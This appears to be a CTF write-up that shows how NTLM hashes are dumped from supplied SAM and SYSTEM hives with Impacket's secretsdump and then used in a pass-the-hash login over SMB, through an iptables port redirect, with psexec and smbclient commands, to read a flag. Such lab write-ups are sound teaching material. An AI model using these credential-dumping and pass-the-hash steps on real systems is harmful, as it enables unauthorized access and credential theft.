CrateCTF 2025 Writeup: Skicka vidare

In this challenge, we were given two mysterious files and a server address. The goal was to find a flag hidden on that server. The catch? We didn't have a password, and the server was listening on a weird, non-standard port.


Step 1: Analyzing the Artifacts

We started with two files provided by the challenge:

  1. sam: This stands for Security Account Manager. On Windows, this registry hive stores the local accounts' password hashes (never the plaintext passwords).
  2. system: This is the SYSTEM registry hive. It contains the "boot key" (SYSKEY) that the sam hive's contents are encrypted with.

You can't read the sam file without the system file. They work together.

Step 2: Dumping the Hashes

Since we have both files, we can extract the password hashes offline. I used a tool called secretsdump.py from the Impacket suite.

secretsdump.py -sam sam -system system LOCAL

The Result: The tool successfully dumped the database. I saw three users: Administrator, Guest, and one that caught my eye immediately: flagholder.

flagholder:1001:aad3...:8737dfdc9280b43767f37cabe1563d8a:::

We now have the NT (NTLM) hash (8737dfdc9280b43767f37cabe1563d8a) for the user flagholder. We don't need to crack it: NTLM authentication only proves knowledge of the hash, never of the password, so the hash alone is enough to log in (a technique called "Pass-the-Hash").
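To make the secretsdump output format concrete, here is a small parser and triage helper I'm adding to this writeup (it is not part of Impacket). It reads `user:rid:lmhash:nthash:::` lines, flags accounts with a blank password or a stored LM hash, and shows which accounts are non-built-in (RID 1000 and up). The sample dump is constructed: only the flagholder line's NT hash comes from the challenge; the other hashes are the well-known empty-password constants.

```python
import re
from dataclasses import dataclass

# Well-known public constants: LM hash of an empty/disabled LM password and
# the NT hash of an empty password. Neither is specific to this challenge.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump SAM line format: user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Constructed sample output (Administrator/Guest hashes are the empty-password
# constants; only the flagholder NT hash is the real one from the challenge).
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
flagholder:1001:aad3b435b51404eeaad3b435b51404ee:8737dfdc9280b43767f37cabe1563d8a:::
[*] Cleaning up...
"""


@dataclass
class SamEntry:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def blank_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def lm_present(self) -> bool:
        # A real LM hash means the far weaker legacy format is still stored.
        return self.lm != EMPTY_LM

    @property
    def impacket_hashes_arg(self) -> str:
        # Value for Impacket's -hashes LMHASH:NTHASH; the LM half may be empty.
        return f":{self.nt}"


def parse_secretsdump(text: str) -> list:
    """Return SamEntry objects for every hash line; other lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append(SamEntry(m["user"], int(m["rid"]), m["lm"], m["nt"]))
    return entries


def blank_password_users(entries: list) -> list:
    return [e.user for e in entries if e.blank_password]


def non_builtin_users(entries: list) -> list:
    # RIDs below 1000 are reserved for built-in accounts (500 = Administrator, 501 = Guest).
    return [e.user for e in entries if e.rid >= 1000]
```

Defensively, the two lists are what you'd report after a SAM/SYSTEM leak: which accounts need a password reset first, and which ones were effectively open already.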

Step 3: The Networking Problem

The challenge description gave us a hint:

"Port 445 may be blocked... try port 21562 instead. There may need to be some iptables-redirect."

When I tried to use standard tools like psexec.py or smbclient.py, they failed.

  1. If I targeted the default port (445), the connection was refused.
  2. If I tried to specify -port 21562, the tools threw an error because they are hard-coded to only accept port 445 or 139.

The Solution: Traffic Redirection

I had to trick my own computer. I used iptables (a Linux firewall tool) to create a rule. This rule tells my computer: "Whenever I try to send traffic to the target IP on port 445, secretly change the destination to port 21562."

First, I got the target IP:

host challs.crate.nu
# Result: 88.131.81.104

Then, I applied the redirection rule:

sudo iptables -t nat -A OUTPUT -p tcp -d 88.131.81.104 --dport 445 -j DNAT --to-destination 88.131.81.104:21562

Note that this rule stays in the nat table after the CTF is over; delete it afterwards by repeating the same command with -D in place of -A.

Step 4: Accessing the Server

Now that the network traffic was fixed, I tried to get a shell using psexec.py targeting port 445 (which my computer redirected to 21562).

psexec.py -port 445 -hashes :8737dfdc9280b43767f37cabe1563d8a flagholder@challs.crate.nu

The Block: It connected! However, it failed with STATUS_ACCESS_DENIED. This happened because psexec uploads a service binary to the C$ or ADMIN$ share and then creates and starts a service through the Service Control Manager. The user flagholder is a regular user, not an Administrator, so they have no permission to write to those shares or to create services.

Step 5: Browsing Files (The Win)

Since I couldn't get a command shell, I decided to just browse the files like a shared folder. I switched to smbclient.py.

smbclient.py -port 445 -hashes :8737dfdc9280b43767f37cabe1563d8a flagholder@challs.crate.nu

It worked! I got an SMB> prompt. I listed the shares:

SMB> shares
sysvol
netlogon
absolutely_no_flags_here
IPC$

The share absolutely_no_flags_here was obviously the place to look.

  1. I connected to the share: use absolutely_no_flags_here
  2. I listed the files: ls
  3. I found flag.txt and read it: cat flag.txt

The Flag: cratectf{pass_the_hash_or_give_me_the_cash}

Key Takeaways:

  • SAM + SYSTEM = Hashes: If you can read these two hives, you can dump every local account's NTLM hash offline, with no cracking required for what follows.
  • Pass-the-Hash: You don't always need the plaintext password; for NTLM authentication the hash itself is the credential.
  • iptables is powerful: Sometimes tools have limitations (like hard-coded ports). You can use the OS to route traffic around those limitations.